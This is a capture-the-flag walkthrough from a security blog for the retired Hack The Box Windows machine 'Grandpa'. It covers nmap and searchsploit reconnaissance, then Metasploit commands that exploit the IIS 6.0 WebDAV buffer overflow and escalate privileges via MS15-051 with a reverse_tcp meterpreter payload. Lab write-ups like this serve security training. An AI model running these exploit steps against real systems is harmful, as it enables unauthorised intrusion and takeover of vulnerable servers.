Security Blog, Rants, Raves, Write-ups, and Code
Grandpa
| Name: | Grandpa 
|
|---|---|
| Release Date: | 12 Apr 2017 |
| Retire Date: | 21 Oct 2017 |
| OS: | Windows  |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
v4l3r0n  00 days, 07 hours, 25 mins, 06 seconds |
 |
v4l3r0n 00 days, 07 hours, 25 mins, 34 seconds |
| Creator: | ch4p  |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -oA ./Grandpa 10.10.10.14
$ nmap -sC -sV -oA ./Grandpa 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 17:16 EDT
Nmap scan report for 10.10.10.14
Host is up (0.060s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Server Date: Thu, 02 Apr 2020 21:17:00 GMT
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.97 seconds
One port. This is either going to be hyper-easy or ridiculously hard. IIS 6.0 should have a slew of vulnerabilities in it.
kali@kali:~/Grandpa$ searchsploit iis 6
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | exploits/windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | exploits/windows/remote/19033.txt
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Side Note: There were a LOT more that showed up using that search, but I only included the ones that specifically called out IIS 6.0
OK. So, I am going to save you a whole LOT of time. I know I desipse using Metasploit. It makes us lazy. However, on this box, the Non-MSF method is way too BUGGY. Literally, it will kick you off you shell and you'll have to revert the box to get it back. Trust me, go the MSF route.
msfconsole
use exploits/windows/iis/iis_webdav_scsstoragepathfromurl
options
set rhosts 10.10.10.14
set lhost 10.10.XX.XX
run
Once that runs, you can run it through the local exploit suggester in MSF. The one I ended up using was MS15_051_client_copy_image. So, background your meterpreter and use it.
background
use exploit/windows/local/ms15_051_client_copy_image
set session 3 (yours may be different)
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.XX.XX
run
When I initially ran it, it failed. So I tried migrating or piggbybacking onto another process. The wmiprvse.exe sounded good.
Grab the flags and kiss this one goodbye.
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.